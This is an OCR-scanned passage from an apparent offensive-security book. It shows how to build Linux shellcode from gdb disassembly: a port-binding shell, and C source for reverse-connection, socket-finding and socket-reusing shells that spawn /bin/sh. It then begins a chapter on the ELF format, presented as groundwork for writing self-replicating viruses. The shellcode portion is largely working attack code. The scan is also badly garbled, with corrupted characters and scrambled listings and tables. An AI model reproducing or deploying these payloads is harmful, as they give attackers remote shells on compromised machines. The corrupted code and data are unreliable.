Ox804827c <main 156>: mow teax, OxB09FSb0 
Ox804828] <main 161>; sub SO0x8, tesp 
OxB048284 <main 164>: push $0x0 

Ox6048286 <main 166>: pushl OxsO09f9b0 


ee 
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OxB04829e¢ <main + 1l?2>: call Oxb04dd190 <_ dup2> 
Ox8046291 <main + 177>: add 50x10, %esp 
Ox8046294 <main + 180>: sub 50x$, tesp 
Ox8048297 <main + 1863>: push $0x1 

Ox8048299 <main + 185>: pushl Oxs809fSb0 
OxBO4829f <main + 191>: eall 0x804d190 <__dup2> 
Ox80482a4 <main + 196>: add S0x10, %esp 
OxB0482a7 <main + 199>: sub $0x8, %tesp 
Ox80482aa <main + 202>: push $0xzZ 

Ox80482ac <main + 204>: pushl Ox809f9b0 
Ox80482b2 <main + 210>: call Ox804d190 <_ dup2> 
Ox80482b7 <main + 215>: add $0x10, %esp 
Ox80482ba <main + 218>: sub $0x4, %esp 
Ox80482bd <main + 221>: push 30x 

OxB0482bf <main + 223>: push $0x808e528 
Ox80482c4 <main + 228>: push 30x#0te52b 
Ox80482c9 <main + 233>: call OxbOdecdO0 <execl> 
Ox80482ce <main + 238>: add 50x10, *esp 
Ox60482d1 <main + 241>: leave 

Ox80482d2 <main + 242>: ret 


End of assembler dump. 
(qd) 


Next, disassemble the socket (), bind(), listen(), accept(), and dup2() functions 
(Listings 14.6 through 14.10). 








Listing 14.6. The disassembled socket() function 





(qdb) disassemble socket 
Dump of assembler code for function socket: 


Ox804d330 <_ socket>: mov tebx, tedx 

OxB04d332 <__ socket + 2Z>: mov 90x66, teax 

Ox804d337 <__ socket + 7>: mov 0x1, tebx 

Ox804d33c <_ socket + 12>; lea Oxd(%esp, 1), tecx 

Ox804d340 <__ socket + 16>: int S0x80 

Ox604d0342 <_ socket + 18>: mov tedx, tebx 

OxB04d344 <_ socket + 20>: cmp sOxffffffs3, teax 

Ox804d347 <__ socket + 23>: jae Ox8034470 <__ syscall error> 
Ox604d34d <_ socket + 29>: ret 


End of assembler dump. 
(qd) 





Listing 14.7. The disassembled bind() function 


(qdb) disassemble bind 

Dump of assembler code for function bind: 
Ox804d2f0 <bind>: mov $ebx, %edx 
Ox804d2f2 <bind + 2>: mov SOx66, %eax 
Ox804d2£7 <bind + 7>: mov SOx2, %ebx 
Ox804dd2fc <bind + 12>: lea Ox4 (%esp, 1), tecx 
Ox804d300 <bind + 16>: int 50x80 

Ox804d302 <bind + 18>: mov $edx, ‘tebx 
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>" 


Ox804d304 <bind + 20>: cmp 
Ox804da307 <bind + 23>: jae 
Ox804d30d <bind + 29>: ret 
End of assembler dump. 
(qdb} 


SOxffffff*S83, eax 
0x8054470 <__ syscall_error> 





Listing 14.8. The disassembled listen() function 


(qdb) disassemble listen 





Dump of assembler code for function listen: 


Ox804d310 <listen>: 


OxB0dd312 <listen + 2>: 

OxBO4Gd3sl7 <lListen + T>: 

OxB04d3le <Listen + 12>: 
Ox804d320 <listen + 16>: 
OxB0d4d322 <listen + 18>: 
OMBOUGd324 <lListen + 20>: 
OxBOdd327 <lListen + 23>: 
OxB04d32d <listen + 29>: 


End of assembler dump. 
{qdb) 








(gdb) disassemble accept 


mov 
mow 
mov 
lea 
int 
mov 
cmp 
jae 
ret 


Listing 14.9. The disassembled accept() function 


Dump of assembler code for function 
Ox8O04d2d0 <_ libc_accept>: 
OxBO0dd2d2 <_ libc_accept + 2>: 
OxB04d2d7 <_ libc_accept + 7>: 
Ox8O0dd2dce <  libec accept + 12>: 
OxBbO4d2e0 < libc accept + 16>: 
Ox804d2e2 <_ libe accept + 18>: 
OxB04d2e4 <_ libc accept + 20>: 
OxB0ddZe4 <_ libe accept + 23>: 
Ox804d2ed <_ libec accept + 29>; 


End of assembler dump. 
(gdb) 


$ebx, %edx 

SOx66, teax 

SOx4, %ebx 

Ox4 (tesp, 1), tecx 

50x60 

tedx, %ebx 

SOxftftffrtss, teax 

Ox8054470 <_ syscall error> 


_ jibe accept: 
mov #ebx, %edx 
mov 20x66, ‘eax 
TOV 50x5, %tebx 
lea Ox4(%esp, 1), tecx 
int S0x80 
mov $edx, tebx 
cmp SOxELELLESS, teax 
jae Ox8054470 <__ syscall _error> 
ret 





Listing 14.10. The disassembled dup2() function 


(qdo) disassemble dup2 


Dump of assembler code for function 


OxBO4d190 <_ dupé>: 


OxB04d192 <_ dupe + 2>; 

OxB0dd196 <_ dupZ + 6>: 

OxB04d19a <_ dup2 + 10>: 
Ox804d19£ < dup? + 15>: 
OxBOd4dlal <_ dup2 + 17>: 
Ox804dla3 < dup? + 19>: 
Ox804dla8 <__dup2 + 24>: 


Ox804dlae <_ dup2 + 30>: 
End of assembler dump. 
(gdb) 


mov 
moy 
moy 
mov 
mov 





__ dupe: 


tebx, %tedx 

Ox8(%esp, 1), *tecx 

Ox4 (esp, 1), %ebx 

2Ox3f, teax 

S0x80 

$edx, Sebx 

SOxfffffO01, teax 

Ox6054470 <_ syscall error> 
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Proceeding as in Section 13.1.3 and using the information from the disassembled func- 
tions, prepare a preliminary shellcode in assembler (Listing 14.11). 





Listing 14.11. A preliminary remote shellcode 





int main() 
{ 
asm ("jmp line 
start: 
popl tesi 


/* socket (AF INET, SOCK STREAM, 0) */ 

xorl teax, teax 

movl *%eax, Ox10(%esi) 
incl *eax 

movl teax, Sebx 

movl teax, OxOc(%esi) 
incl *eax 

movil teax, 0x08 (%esi) 
leal OxO8(S%esi), %ecx 
movb $0x66, tal 

int 30x80 


/* bind(sd, [struct sockaddr *)&éservaddr, sizeof(servaddr)} */ 
incl tebx 
movb $0x10, Ox10(#esi) 
movw tbx, 0x14 (%esi) 
movb tal, Ox08(%esi) 
xorl teax, teax 
movl %eax, *tedx 
movl teax, Oxlé@($esi) 
movb SOx77, *al 
moww tax, Oxl6(%esi) 
leal 0x14 (%#es5i), %ecx 
movl %ecx, Ox0c(%esi) 
leal Ox08(%esi), %ecx 
movb $0x66, tal 
int $0«80 


/* listen(sd, 1) */ 
movil tebx, OxOc(%esi) 
incl tebx 
incl tebx 
movb $0x66, tal 
int 30x80 


/* accept(sd, NULL, 0) */ 
movl tedx, Ox0c(*esi) 
movil tedx, Ox10(%esi) 
movb SOx66, tal 
incl tebx 
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int $0680 


/* dup2(cli, 0) */ 
xchgb %al, %bl 
mowb SOx3f, tal 
xorl tecx, tecx 
int 50x80 


/* dup2(eli, 1) */ 
movb $Ox3f, tal 
incl tecx 
int $0x80 


/* dup2{cli, 2) */ 
movb $0x3f, tal 
incl %ecx 
int $080 


{* execl({) */ 
movwb tdl1, OxO07(%esi1) 
movl tesi, Ox0c(%esi) 
xchql esi, tebx 
leal OxOc(%ebx), %ecx 
movb $0x0b, tal 


int $080 
line: 
call start 
~string \"/bin/sh\" 
"he 





Compile the source code using the following command: 
# gcc tempshell.c -o tempshell 

Now, dump its hexadecimal code: 

# objdumm -D ./tempshell 


Listing 14.12 shows the part of the dump of interest to us. This is how the hexadecimal 
form of the shellcode used in the remote exploit (Listing 14.3) was obtained. 





Listing 14.12. The hexadecimal values of the remote shellcode 





08048430 <main>: 


8048430: 55 push Sebp 
BO48431: a9 e5 mov tesp, tebp 
BO48433: eb 72 jmp 80484a7 <line> 


08048435 <start>: 


#048435: oe pop $esi 

8048436: 31 cO xOr %eax, teax 
8048438: 89 46 10 mov teax, Ox10(%es1) 
B04843b: 40 inc $eax 


B04b43c: 89 ¢3 mov #ean, teDH 


B04843e: 89 46 
8048441: 40 

8048442: 89 46 
80486445: Sd 4de 
BO48448: bO 66 
BO04844a: cd 80 
804844c: 43 

BO04844d: co 46 
8048451: 66 89 
8048455: BB 46 
B048458: 31 ¢0 
BO4845a: B9 c2 
B04845ec: 69 46 
BO4845F: bO 77 
BO04e8461: 66 89 
8048465: Bd 4e 
BO48468: #9 de 
804846b: Bd 4e 
BO4846e: bO 66 
BO4e8470: ed 80 
BO048472: 89 5Se 
BO48475: 43 

8048476: 43 

B048477: bO 66 
e046479: ed 80 
BO4647b: Bo 56 
e04847e: 89 56 
B048461: bO 66 
SO48483: 43 

8048484: ed 80 
BO48486: 86 c3 
BOdSe4Bba: bOQ 3f 
BO04848a: 31 c9 
BO4848c: ed 80 
804848e: bO 3f 
s048490: 4] 

SO048491: cd 80 
8048493: bo 3f 
60468495: 41 

BO48496: cd 80 
8048498; 88 56 
BOqb49b: #9 76 
B8O04849e; B7 £3 
B80484a0: #a 4b 
BO484a3;: bO Ob 
8O0484a5: cd 80 


O80484a7 <line>: 


B0484a7: eb 89 
B0484ac: 2f 
8O0484ad: 62 69 
BO484b0: 2f 
BO0484b1: 73 68 





Oc 


08 
08 


10 
3€ 
08 
ig 
46 
14 


Oe 
O08 


Oe 


Oc 
10 


07 
Oc 


0c 


2x 


10 
14 


ff ff 


das 
jae 
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eax, Oxc(tesi) 
Pax 

teax, Ox8(tesi) 
Ox8 (%esi), %ecx 
SOx66, Sal 
S0x80 

$ebu 

$0x10, OxlO(%esi) 
tbe, Oxl4 (%esi) 
tal, Ox8 (esi) 
eax, teax 
teax, bedx 
teax, Oxl8(*esi} 
50x50, %al 

tax, Oxl6(%esi) 
Oxl4(%esi), tecx 
%ecx, Oxc(*esi) 
Ox8(%esi), tecx 
$066, tal 
50x80 

tebe, Oxc(#esi) 
%eDx 

$ebx 

20x66, tal 
20x80 

tedx, Oxc(tesi) 
$edx, Ox10(%esi) 
70x66, tal 
'ebDx 

50x80 

tal, ‘tbl 

2Ox3f, tal 
‘ecx, eCK 
$0x80 

SOx3f, tal 
$ecx 

50x80 

SOx3f, tal 
$ecx 

50x80 

#d1, Ox? (esi) 
tesi, Oxc(tesi) 
tesi, tebx 

Oxec (Sebx), tecx 
S0xb, tal 
50x80 


8048435 <start> 
tebp, Onde (%ecx) 


804651b <gcc2 compiled. + Oxlb> 
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From now on, all shellcodes will be considered only in the C implementation and you will 
have to convert then to the hexadecimal format by yourself, guided by the example in this section. 
You can also find ready hexadecimal versions for practically any shellcode on the Internet. 


14.4.2. Reverse Connection Shelicode 


The essence of the reverse connection shellcode is that a connection is initiated not by the 
hacker but the remote shellcode itself. That is, after a reverse connection shellcode successfully 
executes on the remote machine, it connects to one of the ports on the hacker’s machine. This 
type of shellcode is in essence a connect back backdoor, which was considered in Chapter 11. 
The source code a reverse connection shellcode is shown in Listing 14.13. The IP address and 
the port, to which the connection is to be made, must be specified in the shellcode. In the ex- 
ample, 127.0.0.1 and 666 are used as the IP address and the port, respectively. The connection 
from this shellcode is accepted running the netcat utility with the -1 and -p switches. 





Listing 14.13. Reverse connection shellcode (reverseshell.c) 





#include<unistd.h> 
finclude<sys/socket.h> 
tinclude<netinet/in.h> 


int soc, rc; 
struct sockaddr in serv addr; 


int main () 
1 
serv addr.sin family = AF_INET; 
‘v_addr.sin_addr.s_ addr = inet_addr("127.0.0.1"); 
‘V_addr.sin port = htons (666); 
oc=socket (AF INET, SOCK STREAM, 0); 
¢ = connect(soc, (struct sockaddr*)&serv addr, sizeof(serv addr)); 
dup? (soc, 0); 
dup2 (soc, 1); 
dup2(soc, 2)3 
exec] ("/bin/sh", "sh™, QO); 


wi 
+ @ 
Ee 


1 & 





14.4.3. Find Shellcode 


The find shellcode does not establish a new TCP/IP connection but uses an existing one. 
This method makes it the most effective way of bypassing the firewall, because commands 
are sent over the same connection used to send the shellcode to the vulnerable host. To use 
“its” connection, the shellcode must know its identifier, which it finds out using the 
getpeername() function. This function provides information about the remote address and 
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port of the connection associated with the given identifier or returns an error if the identifier 
is not associated with any connection. Because identifiers are usually expressed in small inte- 
gers, it will take the shellcode just a short time to try all of them in a loop. The shellcode 
determines “its” connection from among all connections it tries by connecting to the source 
port, that is, to the port, from which the shellcode was infiltrated to the vulnerable host. 
The source code for the shellcode is shown in Listing 14.14. 





Listing 14.14. Find shellcode (findshell.c) 


include <stdlib.h> 
f#include <sys/socket.h> 
finclude <netinet/in.h> 
#include <stdio.h> 


ndefine HACK PORT 1313 


int main(} 
{ 
Int i; 13 
struct sockaddr in sin; 
j = sizeoft(struct sockaddr in); 
for(i = Gs i < 2567 itt) { 
if(getpeername (1, &Sin, &)) < W) 
continue; 
1f(Sin.sin port = htons (HACK PORT) } 
break; 


} 


For(j = O7 j < 27 34+) 
dupz(j, 1)? 


exec] ("/bin/sh", "sh", WUOLL); 





14.4.4. Socket-Reusing Shellcode 


This shellcode also makes it possible to efficiently bypass firewalls by rebinding an already 
open port on the vulnerable host and intercepting all ensuing connections established using 
this port. The only difference between the port-binding shellcode and the socket-reusing 
shellcode is the setsockopt(soc, SOL_SOCKET, SO _REUSEADDR, (char*)&n_reuse, 
sizeof (n_reuse) ) line in the latter, which assigns the socket the SO REUSEADDR attribute. 
This attribute allows binding to be executed on an already opened port. The source code for 
a socket-reusing shellcode is shown in Listing 14.15. 
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Listing 14.15. Socket reusing shellcode (reuseshell.c) 





#include <stdio.h> 
#include <stdlib.h> 
finclude <netinet/in.h> 
finclude <sys/types.h> 
finclude <sys/socket.h> 
finclude <unistd.h> 


int soc, -cli; 

int sins; 

struct sockaddr_in serv_addr; 
struct sockaddr in cli_addr; 


int main({) 


{ 


int n_ reuse = 200; 
sins = Ox10; 
if(fork() == 0) 


{ 





serv addr.sin family = AF_INET; 

serv_addr.sin_addr.s_addr = INADDR_ANY; 

serv addr.sin port = htons (31337); 

soc = socket (AF INET, SOCK STREAM, 0); 

setsockopt (soc, SOL SOCKET, SO REUSEADDR, (char*)&n_reuse, sizeof(n_reuse)); 
bind(sec, (struct sockaddr *)&serv_ addr, sizeoft(serv_addr)); 
listen(soc, 1); 

cli = accept(soc, (struct sockaddr *)4&cli addr, &sins); 

dup2 (cli, 0); 

dupe {cili, 1); 

dup2(cli, 2); 

exec] ( "/bin/sh", "eh". O); 

close (cli); 

exit(d); 





PART IV: 
SELF-REPLICATING 





HACKING SOFTWARE 





Chapter 15: The ELF File Format 





The main format of Linux executable files is the executable and linkable format (ELF). 
Anyone aspiring to writing self-replicating software (primarily viruses) must have a profound 
knowledge of this format. There are numerous sources for the latest ELF specification (version 1.2) 
on the Internet, for example, http://x86.ddj.com/ftp/manuals/tools/elf.pdf. 

In this chapter, I only give a brief presentation of the specification and explore the organi- 
zation of ELF files on a specific example. 


15.1. File Organization 


In the ELF format specification, the organization of an executable ELF file is presented as 
shown in Listing 15.1. 


Listing 15.1. ELF file organization as given in the specification 


ELF header 
Program header table 
Segment IL 


Segment 2 


Section header table (optional) 
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However, it should be represented more exactly, as shown in Listing 15.2. 





Listing 15.2. Truer representation of the ELF file organization 





ELF header 
Program header table 
Segment 1 
Section 1 
Section 


fal 


Section n 


Seqment 2 
Section 1 


Section 2 


Section n 


Segment n 
section 


Section 


at 


Section n 
Section header table (optional) 
symbol table {optional} 
string table (optional) 





Thus, an executable file consists of an ELF header, a program header table, one or more 
segments, an optional section header table, an optional symbol table, and an optional string 
table. Each segment can be divided into sections. 


15.2. Main Structures 


All definitions of the ELF format structures are stored in the /usr/include/elf.h header file. 

The position of the ELF header in a file is fixed; the position of each remaining compo- 
nent is determined by the information in the header. The structure of an ELF header is shown 
in Listing 15.3. 





Listing 15.3. The ELF header structure 





#define EI NIDENT (16) 


typedef struct 
{ 
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unsigned char e ident[EI NIDENT]; /* Signature (Ox7f,'E','L','F") and 
ether information */ 


Elf32 Half e type; /* Pile type */ 

E1f32 Half e machine; /* Hardware architecture required 
for the file */ 

Elf32 Word e version; /* Object file version */ 

Elf32 Addr e entry; /* Virtual address of the program's 
entry point */ 

Elf32_Off e phoff; /* Program header table's offset 
from the start of the file */ 

Elfs2 Off e shoff; /* Section header table's offset 
from the start of the file */ 

Elf32 Word e flags; /* Specific processor flags 
not used in i386 architecture */ 

Elfis2 Half e ehsize; /* Size of ELF header in bytes */ 

Elf32 Half e phentsize; /* Size in bytes of one entry in the 
program header table */ 

Elf32 Half e phnum; /* Number of entries in the program 
header table */ 

Elf32 Half e shentsize; /* Size in bytes of one entry in the 
section header table */ 

Elf32 Half e shnum; /* Number of entries in the section 
header table */ 

E1f32 Half e shstrndx; /* Location of the segment 


containing the string table */ 
} El£32_Ehdr; 





A program header table is an array of structures (table records) that specify how a process 
image is to be created from the segments. Listing 15.4 show the structure of a record. Most 
segments are copied (mapped) into memory and are the corresponding segments of an exe- 
cuted process, for example, code or data segments. 








Listing 15.4. The structure of a program header table record 





typedef struct 
{ 
Elf32 Word p type; /* Segment type */ 
Elf32 Off p offset; /* Segment's offset from start of the file */ 
Elf32 Addr op vaddr; /* Virtual address of the segment */ 
Elf32 Addr ppaddr; /* Physical address of the segment */ 
Elf32 Word op filesz; /* Size of the segment in the file */ 
Elf32 Word p.memsz; /* Size of the segment in memory */ 
Elf32 Word p flags; /* Flags */ 
Elf32 Word p align; /* Value to which segments are aligned */ 
} Elf32_Phdr; 





The optional section header table describes sections, into which the segments are divided. 
Listing 15.5 shows the structure of a section header table record. Sections whose names start 
with a period are special system sections. It is advisable not to prefix application section names 
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with a period so as to avoid conflicts with system sections. The following are some typical sys- 
tem sections: . text (holds the program code), .data (holds initialized data), .bss (holds unin- 
itialized data), . init (holds initialization procedures), .finit (holds finalization procedures), 
and .plt (holds information related to dynamic linking). The loader does not know anything 
about the sections, ignores their attributes, and simply loads the entire segment into the memory. 





Listing 15.5. The structure of a section header table record 


typedef struct 
{ 


Elf32 Word sh name; /* Section name (string tbl index) */ 
Elf32 Word sh_type; /* Section type */ 

Elf32_Word sh_flags; /* Section flags */ 

Elf32 Addr sh_addr; /* Address of the section's first byte */ 
Elf32_Off sh_offset; /* Section's offset from start of file */ 
Elf32 Word sh_size; /* Section size in bytes */ 

Elf32 Word sh_link; /* Link with another section */ 

Elf32 Word sh_info; /* Additional information about section */ 
Elf32_Word sh_addralign; /* Value to which sections are aligned */ 
Elfj2 Word sh entsize; /* Size of embedded element if present */ 


)} E1f32_Shdr; 





The symbol table and the string table together are known as symbolic information. 
The symbol table is an array of structures. The definition of one of these structures is given in 
Listing 15.6. The records in the symbol table are of a fixed length. Names of symbols larger 
than eight characters are stored in the string table. The symbolic information is not mandatory 
for the file's operation and can be removed using the strip command. 





Listing 15.6. The structure of a symbol table record 





typedef struct 

{ 
Elf32 Word st_name; #* Symbol's name (string tbl index) */ 
Elf32 Addr st_value; /* Symbol's value (e.g., an address) */) 
E1f32 Word st size; /* Symbol's size */ 
unsigned char st_info; /* Symbol's type and links */ 
unsigned char st other; /* Symbol's scope */ 
Elf32 Section st_shndx; /* Section's index */ 

} Elf32 Sym; 


15.3. Exploring the Internal Structure 


The internal structure of any ELF file can be explored using the readelf system utility. As an 
example, write a simple program (see Listing 15.7) and explore its structure using readelf. 
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Listing 15.7. A simple program for exploration practice 





#include <stdio.h> 


int main() 


{ 
printi("Hello, World!\n"); 


return 0; 





Compile the program and run readelf with the -h option: 


# gcc hello.c -o hello 
# ./hello 
Hello, World! 
# readelf -h 
ELF Header: 

Magic: 

Class: 

Data: 

Version: 

OS/ABL: 

ABI Version: 

Type: 

Machine: 

Version: 

Entry point address: 

Start of program headers: 

Start of section headers: 

Flags: 

Size of this header: 

Size of program headers: 

Number of program headers: 

Size of section headers: 

Number of section headers: 

Section header string table index: 


.fhelloa 


T£ 45 4c 46 01 O01 


01 00 60 00 00 00 O00 OO 00 O0 


ELF32 

2's complement, little-endian 
1 (current) 

UNIX - System V 

0 

EXEC (Executable file} 

Intel 80386 

0x1 

OxB048360 

52 (bytes into file) 

10640 (bytes into file) 

Oxo 
a 
32 
6 
40 
30 
27 


(bytes) 
(bytes) 


(bytes) 


You will see the ELF header of the hello file. The most interesting information in this output 
is the Entry point address value, which is the address of the program’s execution starting 
address. As you will see later, it is located in the beginning of the . text section. 

Running the utility with the -1 option outputs the program header table: 


# readelf -l ./hello 


Elf file type is EXEC (Executable file) 


Entry point Ox8048360 


There are 6 program headers, starting at offset 52 


Program Headers: 
Type 
PHDR 
INTERP 


Offset VirtAddr 


PhysAddr 
OxO000034 O0x08048034 Ox08048034 Ox000c0 Ox000cO R E Ox4 
OxO000f4 Ox080480f4 OxO80480F4 0x00013 0x00013 R 


FileSiz MemSiz Flg Align 


QOx1 
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[Requesting program interpreter: /lib/ld-linux.so.2] 


LOAD 0x000000 Ox08048000 0x08048000 Ox004f7 Ox004f7 R E Ox1l000 
LOAD Ox0004£8 OxO8O494Fe8 OxO080494F8 Ox000eF Ox00100 RW O0x1l000 
DYNAMIC Ox000540 Ox08049540 0x08049540 Ox000a0 0Ox000a0 RW Ox4 
NOTE 0x000108 Ox08048108 Ox08046108 Ox00020 0x00020 R  Ox4 
Section to Seqment mapping: 
Segment Sections... 
00 
01 -interp 
02 -interp .note.ABI-tag «hash .dynsym .dynstr .gnu.version .gnu.version_r 
rel.,got .rel.plt .init .plt .text .fini .rodata 
03 data .eh_frame .ctors .dtors .got .dynamic .bss 
04 .dynamic 
05 note .ABI-tag 


As you can see, there are only six segments in the program. The utility also listed the sec- 
tions in each segment. 

Running the utility with the -s option outputs the section header table: 

# readelf -S ./hello 

There are 30 section headers, starting at offset 0x2990: 


Section Headers: 


[Nr] Name Type Addr Off Size ES Fig Lk Inf Al 
[ 0] NULL 00000000 O00000 000000 00 0 Oo 40 
[ 1] .interp PROGBITS O80480f4 OO00f4 000013 O00 A QO O J] 
[ 2] .note.ABI-taqg NOTE 08048108 000108 000020 00 AO O 4 
[ 3] .hash HASH 08048128 000128 000034 04 A 4 O 4 
[ 4] .dynsym DYNSYM O804815c 00015c 000080 10 A 5 1 4 
[ 5] .dynstr STRTAB O8048ldc O00lde 000095 00 a 0 0 1 
[ 6] .gnu.version VERS YM 08048272 000272 OO0010 O2 A 4 0 2 
[ 7] .gnu.version_r VERNEED 08048284 000284 000030 00 A 5 1 4 
[ @] .rel.got REL O0B0482b4 0O02b4 000008 08 BR 4 13 4 
[ 9] .rel.plt REL O80482bc O0002Zbc 000028 08 A 4 +b 4 
[10] .init PROGBITS OBO0482e4 O0OOZe4 000018 00 Ax OF OO 4 
[11} .pit PROGBITS O80482fc OOO2fe OOOO6D 04 AX O 0 4 
fl2) .text PROGBITS O8048360 000360 000160 00 AX O 0 16 
[13) .fini PROGBITS O8O04B4c0 O004c0 O000le 00 AX O o0 4 
[14] .rodata PROGBITS OB0484e0 0004e0 000017 00 AO O 4 
[15] .data PROGBITS O80494f8 O004f8 000010 00 WA O O 4 
[16] -eh frame PROGBITS 08049508 000508 000004 00 WA OQ 0 4 
[17] .ctors PROGBITS 0804950c 00050c 000008 00 WA O O 4 
[18] .dtors PROGBITS 08049514 000514 000008 00 WA O 0 4 
[19}) .got PROGBITS OB80495le O0005le 000024 04 WA O QO 4 
[20] .dynamic DYNAMIC 068049540 000540 0000a0 08 WA 5 0 4 
[21] .sbss PROGBITS 080495e0 0005e0 000000 00 WoO oO] 
[22] .bss NOBITS 080495e0 0005e0 000018 00 WA O oO 4 
[23] .stab PROGBITS 00000000 O005e0 0007a4 Oc 24 Oo 4 
[24] .stabstr STRTAB 00000000 O00d84 001967 00 0 0 1 
[25] .comment PROGBITS 00000000 O026eb 000144 00 o oOo I 
[26] .note NOTE O0O000000 OO282f OOOOTE OO G 8 1 
[27] .shstrtab STRTAB 00000000 O028a7 0000e9 00 0 @ 1 
[268] .symtab SYMTAB OOO00000 O02e40 0004e0 10 29 3b. 4 


[29] 


Key to Flags: 
W (write), A {alloc), X (execute), M (merge), S (strings) 


I 


-Strtab 


STRTAB 
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OO000000 003320 00022c 00 0 O i 


(info), L {link order), G (group), x (unknown) 


O (extra OS processing required) o (OS specific), p (processor specific) 


As you can see, the entry point address 0x08048360 is the virtual address of the start of the 
.text code section. 
Running the utility with the -s option outputs the symbol table: 
# readelf -s ./hello 
Symbol table '.dynsym' contains 8 entries: 


Num: 


re 


0 
1 
z 
a 
4 
5 
6 
5 


Value 


> QOOOOO000 
> 0804830c 
: O804831c 


O804832c 


: O804833c 
: O804834c 
: O80484e4 
: OO0O00000 


Size 
0 
129 
172 
202 
50 
157 
4 

0 


Type 
NOTYPE 
FUNC 
FUNC 
FUNC 
FUNC 
FUNC 


Bind 
LOCAL 
WEAF. 
WEAE 


Vis 


DEFAULT 
DEFAULT 
DEFAULT 


GLOBAL DEFAULT 
GLOBAL DEFAULT 


WEAF 


DEFAULT 


OBJECT GLOBAL DEFAULT 


NOTYPE 


WEAF. 


DEFAULT 


Ndx 
UND 
UND 
UND 
UND 
UND 
UND 

14 
UND 


symbol table '.symtab' contains 78 entries: 


Numi: 


ae 66 ae Ce en 2 


Value 


; G0000000 
: O8048084 


O8048108 
08048128 


: 0804815c 


O80481ldc 


> O8048272 
: O8048284 


O80482b4 


: O80482bec 
: O80482e4 
: O80482fc 
: 08048360 
> O80484c0 
: O80484e0 
: O80494f8 
: 08049508 
> 0804950c 
: 08049514 
: 0804951c 
: 08049540 
> 080495e0 
: O80495e0 
- 00000000 
: 00000000 
: 00000000 
; 60000000 


00000000 
00000000 


Size 


oo coc ccc cc oo coucoococcococooacococo oo eo 


Type 
NOTYPE 

SECTION 
SECTION 
SECTION 
SECTION 
SECTION 
SECTION 
SECTION 
SECTION 
SECTION 
SECTION 
SECTION 
SECTION 
obs T LON 
SECTION 
SECTION 
SECTION 
SECTION 
SECTION 
SECTION 
SECTION 
SECTION 
SECTION 
SECTION 
SBT LON 
SECTION 
SECTION 
SECTION 
SECTION 


Bind 

LOCAL 
LOCAL 
LOCAL 


Vis 

DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 


Ndx 
UND 


Name 


__register frame info@GLIBc 2.0 (2) 
__deregister frame info@GLIBC 2.0 (2) 
__libec start_main@GLIBC_2.0 (2) 
printf@GLIBC 2.0 (2) 

__¢xa_ finalize@GLIBC 2.1.3 (3) 

_I0 stdin used 

__gmon start__ 


Name 
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69: 
70: 
Tis 
T2: 
733 
74: 
foo Br 
Te: 
Tis 


Symbols are different names of functions, files, and other objects. Moreover, you can see 
that the table’s entries are stored in two sections: .dynsym and .symtab. 
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00000000 
00000000 
08048384 
08048384 
00000000 
00000000 


: O80483b0 
- 08049500 
: 08049514 


08049504 
O80483b60 


; 08049508 


08048410 


: 080495e0 
: 08048420 
: 08048450 


08049508 


: O804950c 


00000000 
O8048480 
080484580 
08049510 
O80464b0 
08049506 
08049518 
08049508 
00000000 
080484c0 
00000000 
08048460 
08049540 
0804830c 


: O80484e0 
: 080482e4 
: O080483ic 


08048360 
080495e0 
O8048460 
OBO4832c 


: O80494T8 


0804833e¢ 
O80484c0 
0804834c 
080495e0 
080495lc 
0804958 
O80484e4 
080494f8 
ooooo000 


Omen f ff eo oOo fo 2 oo & 


Bo 
py 


— ens 
| ha 


Pa 
oS 
ion 


2RCTION LOCAL 


FILE 
NOTYPE 
FUNC 
FILE 
FILE 
NOTYPE 
OBJECT 
OBJECT 
OBJECT 
FUNC 
OBJECT 
FUNC 
OBJECT 
FUNC 
FUNC 
OBJECT 
OBJECT 
FILE 
NOTY PE 
FUNC 
OBJECT 
FUNC 
OBJECT 
OBJECT 
OBJECT 
FILE 
NOTYPE 
FILE 
NOTYPE 
OBJECT 
FUNC 
NOTYPE 
FUNC 
FUNC 
NOTYPE 
OBJECT 
FUNC 
FUNC 
NOTYPE 
FUNC 
FUNC 
FUNC 
OBJECT 
OBJECT 
OBJECT 
OBJECT 
NOTYPE 
NOTYPE 


LOCAL 
LOCAL 


GLOBAL 
GLOBAL 
WEAK 


DEFAOQLT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 
DEFAULT 


29 
ABS 
12 
12 
ABS 
ABS 
12 
ts 
18 
3 
l2 
16 
12 
22 
12 
12 
LS 
1? 
ABS 
12 
12 
17 
12 
15 
18 
15 
ABS 
12 
ABS 
12 
20) 
UND 
14 
10 
UND 
lz 
ABS 
12 
UND 
15 
UND 
13 
UND 
ABS 
19 
ABS 
14 
15 


OND 


initfini.c 
gec2 compiled. 
call gmon start 


ertstuff.c 
gcc2 compiled. 


p.0 


__DTOR_LIST _ 
completed. 1 

__46 global dtors aux 
__EH FRAME BEGIN _ 
fini_dummy 


object.2 


frame dummy 
init_dummy 
force to data 
_ CTOR LIsT _ 
crtstuff.c 
gcc2_compiled. 
__do global _ctors_aux 
__CTOR_END _ 
init dummy 
force _to data 
__DTOR END _ 


initfini.c 
gcec2 compiled, 


hello.e 


goc2 compiled. 


_ DYNAMIC 


__register_frame_info@@GLIBC_ 2.0 


_ftp_hw 
_init 


__deregister_frame_info@@GLIBC_2.0 


_start 


__bss_start 


main 


__libc_start_main@@GLIBC 2.0 
data_start 
printf@@GLIBC 2.0 


_ fini 


__cxa_finalize@@GLIBC 2.1.3 


_edata 


_GLOBAL OFFSET TABLE 


end 


_I0 stdin used 
__ data start 
__gmon_ start __ 


Use the strip utility to delete the 
